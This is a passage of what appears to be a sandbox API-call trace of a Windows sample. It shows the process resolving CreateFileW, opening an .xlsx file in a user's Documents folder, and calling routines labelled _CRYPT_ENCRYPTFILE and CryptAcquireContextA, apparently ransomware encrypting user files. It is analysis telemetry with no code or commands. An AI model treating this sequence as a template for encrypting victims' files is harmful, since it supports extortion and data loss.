lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.778] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0075.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.778] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0075.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.779] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\aotbgaayxtk159gxw.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0075.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431daa0 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.782] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.784] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.784] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.784] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0075.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431daa0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9da0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.786] CloseHandle (hObject=0x298) returned 1 [0075.786] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.786] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.786] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfde3f130, ftCreationTime.dwHighDateTime=0x1d5bec0, ftLastAccessTime.dwLowDateTime=0xe3ed4f80, ftLastAccessTime.dwHighDateTime=0x1d5ee5c, ftLastWriteTime.dwLowDateTime=0xe3ed4f80, ftLastWriteTime.dwHighDateTime=0x1d5ee5c, nFileSizeHigh=0x0, nFileSizeLow=0x12292, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="aOtbGAAYxtk159gxW.xlsx", cAlternateFileName="AOTBGA~1.XLS")) returned 0x41ac600 [0075.787] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0075.787] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0075.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0075.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0075.787] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0075.788] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.788] CharUpperBuffW (in: 